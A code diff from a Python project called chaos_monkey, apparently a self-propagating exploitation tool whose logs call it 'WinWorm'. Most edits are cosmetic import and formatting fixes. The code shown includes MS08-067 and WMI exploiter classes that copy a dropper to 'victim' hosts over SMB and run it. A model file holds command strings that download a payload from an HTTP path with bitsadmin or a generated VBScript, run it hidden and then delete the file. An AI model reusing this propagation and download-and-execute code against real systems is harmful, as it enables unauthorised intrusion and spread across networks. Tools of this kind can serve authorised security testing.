from transport import HTTPServer from chaos_monkey.transport import HTTPServer
from network.info import get_free_tcp_port from chaos_monkey.network.info import get_free_tcp_port
from network.firewall import app as firewall from chaos_monkey.network.firewall import app as firewall
from impacket.dcerpc.v5 import transport, srvs from impacket.dcerpc.v5 import transport, srvs
from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError
from impacket.smbconnection import SMBConnection, SMB_DIALECT from impacket.smbconnection import SMBConnection, SMB_DIALECT
@ -25,6 +23,7 @@ __author__ = 'itamar'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class AccessDeniedException(Exception): class AccessDeniedException(Exception):
def __init__(self, host, username, password, domain): def __init__(self, host, username, password, domain):
super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" % super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" %

23
chaos_monkey/exploit/win_ms08_067.py
View File

@ -11,12 +11,12 @@ import time
import socket import socket
from enum import IntEnum from enum import IntEnum
from logging import getLogger from logging import getLogger
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from chaos_monkey.model import DROPPER_CMDLINE, MONKEY_CMDLINE
from exploit import HostExploiter from chaos_monkey.exploit import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from chaos_monkey.exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp from chaos_monkey.network.tools import check_port_tcp
from network import SMBFinger from chaos_monkey.network import SMBFinger
try: try:
from impacket import smb from impacket import smb
@ -174,11 +174,10 @@ class Ms08_067_Exploiter(HostExploiter):
def is_os_supported(self, host): def is_os_supported(self, host):
if host.os.get('type') in self._target_os_type and \ if host.os.get('type') in self._target_os_type and \
host.os.get('version') in self._windows_versions.keys(): host.os.get('version') in self._windows_versions.keys():
return True return True
if not host.os.get('type') or (host.os.get('type') in self._target_os_type and \ if not host.os.get('type') or (host.os.get('type') in self._target_os_type and not host.os.get('version')):
not host.os.get('version')):
is_smb_open,_ = check_port_tcp(host.ip_addr, 445) is_smb_open,_ = check_port_tcp(host.ip_addr, 445)
if is_smb_open: if is_smb_open:
smb_finger = SMBFinger() smb_finger = SMBFinger()
@ -260,8 +259,10 @@ class Ms08_067_Exploiter(HostExploiter):
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc) LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc)
return False return False
finally: finally:
try: sock.close() try:
except: pass sock.close()
except:
pass
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path, host, cmdline) remote_full_path, host, cmdline)

16
chaos_monkey/exploit/wmiexec.py
View File

@ -1,15 +1,15 @@
import socket import socket
import ntpath import ntpath
import logging import logging
import traceback import traceback
from model import DROPPER_CMDLINE, MONKEY_CMDLINE, MONKEY_CMDLINE_HTTP from chaos_monkey.model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
from exploit import HostExploiter from chaos_monkey.exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, HTTPTools, AccessDeniedException, get_target_monkey from chaos_monkey.exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class WmiExploiter(HostExploiter): class WmiExploiter(HostExploiter):
_target_os_type = ['windows'] _target_os_type = ['windows']
@ -68,7 +68,7 @@ class WmiExploiter(HostExploiter):
LOG.debug("Skipping %r - already infected", host) LOG.debug("Skipping %r - already infected", host)
return False return False
#copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(host, remote_full_path = SmbTools.copy_file(host,
self._config.psexec_user, self._config.psexec_user,
password, password,
@ -76,8 +76,8 @@ class WmiExploiter(HostExploiter):
self._config.dropper_target_path) self._config.dropper_target_path)
if not remote_full_path: if not remote_full_path:
wmi_connection.close() wmi_connection.close()
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path.lower(): elif remote_full_path.lower() != self._config.dropper_target_path.lower():
cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path} cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}

4
chaos_monkey/model/__init__.py
View File

@ -1,3 +1,5 @@
from host import VictimHost
__author__ = 'itamar' __author__ = 'itamar'
MONKEY_ARG = "m0nk3y" MONKEY_ARG = "m0nk3y"
@ -10,5 +12,3 @@ MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priorit
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s' % (MONKEY_ARG, ) RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, ) RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1' DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
from host import VictimHost

1
chaos_monkey/model/host.py
View File

@ -1,5 +1,6 @@
__author__ = 'itamar' __author__ = 'itamar'
class VictimHost(object): class VictimHost(object):
def __init__(self, ip_addr): def __init__(self, ip_addr):
self.ip_addr = ip_addr self.ip_addr = ip_addr

23
chaos_monkey/monkey.py
View File

@ -2,11 +2,10 @@ import sys
import os import os
import time import time
import logging import logging
import platform
from system_singleton import SystemSingleton from system_singleton import SystemSingleton
from network.firewall import app as firewall from network.firewall import app as firewall
from control import ControlClient from control import ControlClient
from config import WormConfiguration, EXTERNAL_CONFIG_FILE from config import WormConfiguration
from network.network_scanner import NetworkScanner from network.network_scanner import NetworkScanner
import tunnel import tunnel
import argparse import argparse
@ -17,14 +16,6 @@ __author__ = 'itamar'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# TODO:
# 1. Remote dating of copied file
# 2. OS Detection prior to exploit
# 3. Exploit using token credentials
# 4. OS Support for exploitation modules (win / linux specific)
# 5. Linux portability
# 6. Clear eventlog after exploitation
# 7. Add colors to logger
class ChaosMonkey(object): class ChaosMonkey(object):
def __init__(self, args): def __init__(self, args):
@ -35,6 +26,10 @@ class ChaosMonkey(object):
self._parent = None self._parent = None
self._default_tunnel = None self._default_tunnel = None
self._args = args self._args = args
self._network = None
self._dropper_path = None
self._exploiters = None
self._fingerprint = None
def initialize(self): def initialize(self):
LOG.info("WinWorm is initializing...") LOG.info("WinWorm is initializing...")
@ -53,7 +48,6 @@ class ChaosMonkey(object):
self._network = NetworkScanner() self._network = NetworkScanner()
self._dropper_path = sys.argv[0] self._dropper_path = sys.argv[0]
def start(self): def start(self):
LOG.info("WinWorm is running...") LOG.info("WinWorm is running...")
@ -97,11 +91,9 @@ class ChaosMonkey(object):
continue continue
elif machine in self._fail_exploitation_machines: elif machine in self._fail_exploitation_machines:
if WormConfiguration.retry_failed_explotation: if WormConfiguration.retry_failed_explotation:
LOG.debug("%r - exploitation failed before, trying again", LOG.debug("%r - exploitation failed before, trying again", machine)
machine)
else: else:
LOG.debug("Skipping %r - exploitation failed before", LOG.debug("Skipping %r - exploitation failed before", machine)
machine)
continue continue
successful_exploiter = None successful_exploiter = None
@ -147,7 +139,6 @@ class ChaosMonkey(object):
else: else:
self._fail_exploitation_machines.add(machine) self._fail_exploitation_machines.add(machine)
time.sleep(WormConfiguration.timeout_between_iterations) time.sleep(WormConfiguration.timeout_between_iterations)
if self._keep_running and WormConfiguration.alive: if self._keep_running and WormConfiguration.alive:

13
chaos_monkey/monkeyfs.py
View File

@ -7,10 +7,11 @@ MONKEYFS_PREFIX = 'monkeyfs://'
open_orig = open open_orig = open
class VirtualFile(BytesIO):
_vfs = {} #virtual File-System
def __init__(self, name, mode = 'r', buffering = None): class VirtualFile(BytesIO):
_vfs = {} # virtual File-System
def __init__(self, name, mode='r', buffering=None):
if not name.startswith(MONKEYFS_PREFIX): if not name.startswith(MONKEYFS_PREFIX):
name = MONKEYFS_PREFIX + name name = MONKEYFS_PREFIX + name
self.name = name self.name = name
@ -32,23 +33,27 @@ class VirtualFile(BytesIO):
def isfile(path): def isfile(path):
return VirtualFile._vfs.has_key(path) return VirtualFile._vfs.has_key(path)
def getsize(path): def getsize(path):
if path.startswith(MONKEYFS_PREFIX): if path.startswith(MONKEYFS_PREFIX):
return VirtualFile.getsize(path) return VirtualFile.getsize(path)
else: else:
return os.stat(path).st_size return os.stat(path).st_size
def isfile(path): def isfile(path):
if path.startswith(MONKEYFS_PREFIX): if path.startswith(MONKEYFS_PREFIX):
return VirtualFile.isfile(path) return VirtualFile.isfile(path)
else: else:
return os.path.isfile(path) return os.path.isfile(path)
def virtual_path(name): def virtual_path(name):
return "%s%s" % (MONKEYFS_PREFIX, name) return "%s%s" % (MONKEYFS_PREFIX, name)
def open(name, mode='r', buffering=-1): def open(name, mode='r', buffering=-1):
#use normal open for regular paths, and our "virtual" open for monkeyfs:// paths # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths
if name.startswith(MONKEYFS_PREFIX): if name.startswith(MONKEYFS_PREFIX):
return VirtualFile(name, mode, buffering) return VirtualFile(name, mode, buffering)
else: else:

18
chaos_monkey/network/__init__.py
View File

@ -1,9 +1,14 @@
from abc import ABCMeta, abstractmethod from abc import ABCMeta, abstractmethod
import socket from ping_scanner import PingScanner
from tcp_scanner import TcpScanner
from smbfinger import SMBFinger
from sshfinger import SSHFinger
from info import local_ips
from info import get_free_tcp_port
__author__ = 'itamar' __author__ = 'itamar'
class HostScanner(object): class HostScanner(object):
__metaclass__ = ABCMeta __metaclass__ = ABCMeta
@ -11,17 +16,10 @@ class HostScanner(object):
def is_host_alive(self, host): def is_host_alive(self, host):
raise NotImplementedError() raise NotImplementedError()
class HostFinger(object): class HostFinger(object):
__metaclass__ = ABCMeta __metaclass__ = ABCMeta
@abstractmethod @abstractmethod
def get_host_fingerprint(self, host): def get_host_fingerprint(self, host):
raise NotImplementedError() raise NotImplementedError()
from ping_scanner import PingScanner
from tcp_scanner import TcpScanner
from smbfinger import SMBFinger
from sshfinger import SSHFinger
from info import local_ips
from info import get_free_tcp_port

18
chaos_monkey/network/firewall.py
View File

@ -2,6 +2,7 @@ import subprocess
import sys import sys
import platform import platform
class FirewallApp(object): class FirewallApp(object):
def is_enabled(self, **kwargs): def is_enabled(self, **kwargs):
return False return False
@ -24,8 +25,10 @@ class FirewallApp(object):
def close(self): def close(self):
return return
def _run_netsh_cmd(command, args): def _run_netsh_cmd(command, args):
cmd = subprocess.Popen("netsh %s %s" % (command, " ".join(['%s="%s"'%(key,value) for key,value in args.items() if value])), stdout=subprocess.PIPE) cmd = subprocess.Popen("netsh %s %s" % (command, " ".join(['%s="%s"' % (key, value) for key, value in args.items()
if value])), stdout=subprocess.PIPE)
return cmd.stdout.read().strip().lower().endswith('ok.') return cmd.stdout.read().strip().lower().endswith('ok.')
@ -76,14 +79,14 @@ class WinAdvFirewall(FirewallApp):
return None return None
def listen_allowed(self, **kwargs): def listen_allowed(self, **kwargs):
if False == self.is_enabled(): if not self.is_enabled():
return True return True
for rule in self._rules.values(): for rule in self._rules.values():
if rule.get('program') == sys.executable and \ if rule.get('program') == sys.executable and \
'in' == rule.get('dir') and \ 'in' == rule.get('dir') and \
'allow' == rule.get('action') and \ 'allow' == rule.get('action') and \
4 == len(rule.keys()): 4 == len(rule.keys()):
return True return True
return False return False
@ -144,12 +147,11 @@ class WinFirewall(FirewallApp):
return None return None
def listen_allowed(self, **kwargs): def listen_allowed(self, **kwargs):
if False == self.is_enabled(): if not self.is_enabled():
return True return True
for rule in self._rules.values(): for rule in self._rules.values():
if rule.get('program') == sys.executable and \ if rule.get('program') == sys.executable and 'ENABLE' == rule.get('mode'):
'ENABLE' == rule.get('mode'):
return True return True
return False return False

6
chaos_monkey/network/info.py
View File

@ -14,6 +14,7 @@ if sys.platform == "win32":
else: else:
import fcntl import fcntl
def local_ips(): def local_ips():
result = [] result = []
try: try:
@ -39,10 +40,11 @@ else:
addr = socket.inet_ntoa(namestr[i+20:i+24]) addr = socket.inet_ntoa(namestr[i+20:i+24])
if not addr.startswith('127'): if not addr.startswith('127'):
result.append(addr) result.append(addr)
#name of interface is (namestr[i:i+16].split('\0', 1)[0] # name of interface is (namestr[i:i+16].split('\0', 1)[0]
finally: finally:
return result return result
def get_free_tcp_port(min_range=1000, max_range=65535): def get_free_tcp_port(min_range=1000, max_range=65535):
start_range = min(1, min_range) start_range = min(1, min_range)
max_range = min(65535, max_range) max_range = min(65535, max_range)
@ -52,7 +54,7 @@ def get_free_tcp_port(min_range=1000, max_range=65535):
for i in range(min_range, max_range): for i in range(min_range, max_range):
port = randint(start_range, max_range) port = randint(start_range, max_range)
if not port in in_use: if port not in in_use:
return port return port
return None return None

8
chaos_monkey/network/network_scanner.py
View File

@ -1,11 +1,9 @@
import time import time
import socket
import logging import logging
from network import HostScanner from . import HostScanner
from config import WormConfiguration from chaos_monkey.config import WormConfiguration
from info import local_ips from info import local_ips
from network.range import * from range import *
__author__ = 'itamar' __author__ = 'itamar'

21
chaos_monkey/network/ping_scanner.py
View File

@ -2,8 +2,8 @@ import os
import sys import sys
import subprocess import subprocess
import logging import logging
from network import HostScanner, HostFinger from . import HostScanner, HostFinger
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
import re import re
__author__ = 'itamar' __author__ = 'itamar'
@ -16,6 +16,7 @@ WINDOWS_TTL = 128
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class PingScanner(HostScanner, HostFinger): class PingScanner(HostScanner, HostFinger):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
@ -27,7 +28,7 @@ class PingScanner(HostScanner, HostFinger):
timeout = self._config.ping_scan_timeout timeout = self._config.ping_scan_timeout
if not "win32" == sys.platform: if not "win32" == sys.platform:
timeout = timeout / 1000 timeout /= 1000
return 0 == subprocess.call(["ping", return 0 == subprocess.call(["ping",
PING_COUNT_FLAG, "1", PING_COUNT_FLAG, "1",
@ -41,15 +42,15 @@ class PingScanner(HostScanner, HostFinger):
timeout = self._config.ping_scan_timeout timeout = self._config.ping_scan_timeout
if not "win32" == sys.platform: if not "win32" == sys.platform:
timeout = timeout / 1000 timeout /= 1000
sub_proc = subprocess.Popen(["ping", sub_proc = subprocess.Popen(["ping",
PING_COUNT_FLAG, PING_COUNT_FLAG,
"1", "1",
PING_TIMEOUT_FLAG, PING_TIMEOUT_FLAG,
str(timeout), host.ip_addr], str(timeout), host.ip_addr],
stdout=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE) stderr=subprocess.PIPE)
output = " ".join(sub_proc.communicate()) output = " ".join(sub_proc.communicate())
regex_result = self._ttl_regex.search(output) regex_result = self._ttl_regex.search(output)

4
chaos_monkey/network/range.py
View File

@ -2,7 +2,7 @@ import socket
import random import random
import struct import struct
from abc import ABCMeta, abstractmethod from abc import ABCMeta, abstractmethod
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
__author__ = 'itamar' __author__ = 'itamar'
@ -35,7 +35,7 @@ class ClassCRange(NetworkRange):
def __repr__(self): def __repr__(self):
return "<ClassCRange %s-%s>" % (socket.inet_ntoa(struct.pack(">L", self._base_address + 1)), return "<ClassCRange %s-%s>" % (socket.inet_ntoa(struct.pack(">L", self._base_address + 1)),
socket.inet_ntoa(struct.pack(">L", self._base_address + 254))) socket.inet_ntoa(struct.pack(">L", self._base_address + 254)))
def _get_range(self): def _get_range(self):
return range(1, 254) return range(1, 254)

19
chaos_monkey/network/smbfinger.py
View File

@ -1,23 +1,21 @@
import re
import sys
import socket import socket
import struct import struct
import string
import logging import logging
from network import HostFinger from chaos_monkey.network import HostFinger
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
from odict import odict from odict import odict
import select
SMB_PORT = 445 SMB_PORT = 445
SMB_SERVICE = 'tcp-445' SMB_SERVICE = 'tcp-445'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class Packet():
class Packet(object):
fields = odict([ fields = odict([
("data", ""), ("data", ""),
]) ])
def __init__(self, **kw): def __init__(self, **kw):
self.fields = odict(self.__class__.fields) self.fields = odict(self.__class__.fields)
for k,v in kw.items(): for k,v in kw.items():
@ -25,9 +23,11 @@ class Packet():
self.fields[k] = v(self.fields[k]) self.fields[k] = v(self.fields[k])
else: else:
self.fields[k] = v self.fields[k] = v
def __str__(self): def __str__(self):
return "".join(map(str, self.fields.values())) return "".join(map(str, self.fields.values()))
##### SMB Packets ##### ##### SMB Packets #####
class SMBHeader(Packet): class SMBHeader(Packet):
fields = odict([ fields = odict([
@ -45,6 +45,7 @@ class SMBHeader(Packet):
("mid", "\x00\x00"), ("mid", "\x00\x00"),
]) ])
class SMBNego(Packet): class SMBNego(Packet):
fields = odict([ fields = odict([
("wordcount", "\x00"), ("wordcount", "\x00"),
@ -55,6 +56,7 @@ class SMBNego(Packet):
def calculate(self): def calculate(self):
self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"]))) self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
class SMBNegoFingerData(Packet): class SMBNegoFingerData(Packet):
fields = odict([ fields = odict([
("separator1","\x02" ), ("separator1","\x02" ),
@ -71,6 +73,7 @@ class SMBNegoFingerData(Packet):
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"), ("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
]) ])
class SMBSessionFingerData(Packet): class SMBSessionFingerData(Packet):
fields = odict([ fields = odict([
("wordcount", "\x0c"), ("wordcount", "\x0c"),
@ -88,9 +91,11 @@ class SMBSessionFingerData(Packet):
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
]) ])
def calculate(self): def calculate(self):
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2] self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
class SMBFinger(HostFinger): class SMBFinger(HostFinger):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration

18
chaos_monkey/network/sshfinger.py
View File

@ -1,14 +1,7 @@
import re import re
import sys from chaos_monkey.network import HostFinger
import socket from chaos_monkey.network.tools import check_port_tcp
import struct from chaos_monkey.model.host import VictimHost
import string
import logging
from network import HostFinger
import socket
import select
from network.tools import check_port_tcp
from model.host import VictimHost
SSH_PORT = 22 SSH_PORT = 22
SSH_SERVICE_DEFAULT = 'tcp-22' SSH_SERVICE_DEFAULT = 'tcp-22'
@ -17,6 +10,7 @@ TIMEOUT = 10
BANNER_READ = 1024 BANNER_READ = 1024
LINUX_DIST_SSH = ['ubuntu', 'debian'] LINUX_DIST_SSH = ['ubuntu', 'debian']
class SSHFinger(HostFinger): class SSHFinger(HostFinger):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
@ -28,7 +22,7 @@ class SSHFinger(HostFinger):
if banner.lower().find(dist) != -1: if banner.lower().find(dist) != -1:
host.os['type'] = 'linux' host.os['type'] = 'linux'
os_version = banner.split(' ').pop().strip() os_version = banner.split(' ').pop().strip()
if not host.os.has_key('version'): if 'version' not in host.os:
host.os['version'] = os_version host.os['version'] = os_version
else: else:
host.services[service]['os-version'] = os_version host.services[service]['os-version'] = os_version
@ -37,7 +31,7 @@ class SSHFinger(HostFinger):
def get_host_fingerprint(self, host): def get_host_fingerprint(self, host):
assert isinstance(host, VictimHost) assert isinstance(host, VictimHost)
for name,data in host.services.items(): for name, data in host.services.items():
banner = data.get('banner', '') banner = data.get('banner', '')
if self._banner_regex.search(banner): if self._banner_regex.search(banner):
self._banner_match(name, host, banner) self._banner_match(name, host, banner)

12
chaos_monkey/network/tcp_scanner.py
View File

@ -1,15 +1,13 @@
import time import time
import socket from chaos_monkey.network import HostScanner, HostFinger
from network import HostScanner, HostFinger from chaos_monkey.model.host import VictimHost
from model.host import VictimHost from chaos_monkey.network.tools import check_port_tcp
from network.tools import check_port_tcp
import select
__author__ = 'itamar' __author__ = 'itamar'
BANNER_READ = 1024 BANNER_READ = 1024
class TcpScanner(HostScanner, HostFinger): class TcpScanner(HostScanner, HostFinger):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
@ -30,7 +28,7 @@ class TcpScanner(HostScanner, HostFinger):
self._config.tcp_scan_get_banner) self._config.tcp_scan_get_banner)
if is_open: if is_open:
count+=1 count += 1
service = 'tcp-' + str(target_port) service = 'tcp-' + str(target_port)
host.services[service] = {} host.services[service] = {}
if banner: if banner:

10
chaos_monkey/network/tools.py
View File

@ -7,6 +7,7 @@ BANNER_READ = 1024
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False): def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout) sock.settimeout(timeout)
@ -14,10 +15,10 @@ def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
try: try:
sock.connect((ip, port)) sock.connect((ip, port))
except socket.timeout: except socket.timeout:
return (False, None) return False, None
except socket.error, exc: except socket.error, exc:
LOG.debug("Check port: %s:%s, Exception: %s", ip, port, exc) LOG.debug("Check port: %s:%s, Exception: %s", ip, port, exc)
return (False, None) return False, None
banner = None banner = None
@ -30,7 +31,8 @@ def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
pass pass
sock.close() sock.close()
return (True, banner) return True, banner
def check_port_udp(ip, port, timeout=DEFAULT_TIMEOUT): def check_port_udp(ip, port, timeout=DEFAULT_TIMEOUT):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@ -47,4 +49,4 @@ def check_port_udp(ip, port, timeout=DEFAULT_TIMEOUT):
pass pass
sock.close() sock.close()
return (is_open, data) return is_open, data

9
chaos_monkey/system_singleton.py
View File

@ -1,4 +1,3 @@
import sys import sys
import ctypes import ctypes
import logging import logging
@ -9,6 +8,7 @@ __author__ = 'itamar'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class _SystemSingleton(object): class _SystemSingleton(object):
__metaclass__ = ABCMeta __metaclass__ = ABCMeta
@ -44,7 +44,7 @@ class WindowsSystemSingleton(_SystemSingleton):
last_error = ctypes.windll.kernel32.GetLastError() last_error = ctypes.windll.kernel32.GetLastError()
if not handle: if not handle:
LOG.error("Cannot acquire system singleton %r, unknown error %d", LOG.error("Cannot acquire system singleton %r, unknown error %d",
self._mutex_name, last_error) self._mutex_name, last_error)
return False return False
@ -86,13 +86,12 @@ class LinuxSystemSingleton(_SystemSingleton):
sock.bind('\0' + self._unix_sock_name) sock.bind('\0' + self._unix_sock_name)
except socket.error, e: except socket.error, e:
LOG.error("Cannot acquire system singleton %r, error code %d, error: %s", LOG.error("Cannot acquire system singleton %r, error code %d, error: %s",
self._unix_sock_name, e.args[0], e.args[1]) self._unix_sock_name, e.args[0], e.args[1])
return False return False
self._sock_handle = sock self._sock_handle = sock
LOG.debug("Global singleton mutex %r acquired", LOG.debug("Global singleton mutex %r acquired", self._unix_sock_name)
self._unix_sock_name)
return True return True

5
chaos_monkey/transport/__init__.py
View File

@ -1,5 +1,4 @@
__author__ = 'hoffer'
from ftp import FTPServer from ftp import FTPServer
from http import HTTPServer from http import HTTPServer
__author__ = 'hoffer'

1
chaos_monkey/transport/base.py
View File

@ -1,5 +1,6 @@
from threading import Thread from threading import Thread
class TransportProxyBase(Thread): class TransportProxyBase(Thread):
def __init__(self, local_port, dest_host=None, dest_port=None, local_host=''): def __init__(self, local_port, dest_host=None, dest_port=None, local_host=''):
self.local_host = local_host self.local_host = local_host

15
chaos_monkey/transport/ftp.py
View File

@ -1,8 +1,9 @@
import os,socket,threading,time import socket, threading, time
import StringIO import StringIO
__author__ = 'hoffer' __author__ = 'hoffer'
class FTPServer(threading.Thread): class FTPServer(threading.Thread):
def __init__(self, local_ip, local_port, files): def __init__(self, local_ip, local_port, files):
self.files=files self.files=files
@ -47,13 +48,16 @@ class FTPServer(threading.Thread):
self.conn.send('451 Sorry.\r\n') self.conn.send('451 Sorry.\r\n')
def USER(self,cmd): def USER(self,cmd):
self.conn.send('331 OK.\r\n') self.conn.send('331 OK.\r\n')
def PASS(self,cmd): def PASS(self,cmd):
self.conn.send('230 OK.\r\n') self.conn.send('230 OK.\r\n')
#self.conn.send('530 Incorrect.\r\n')
def QUIT(self,cmd): def QUIT(self,cmd):
self.conn.send('221 Goodbye.\r\n') self.conn.send('221 Goodbye.\r\n')
def NOOP(self,cmd): def NOOP(self,cmd):
self.conn.send('200 OK.\r\n') self.conn.send('200 OK.\r\n')
def TYPE(self,cmd): def TYPE(self,cmd):
self.mode=cmd[5] self.mode=cmd[5]
self.conn.send('200 Binary mode.\r\n') self.conn.send('200 Binary mode.\r\n')
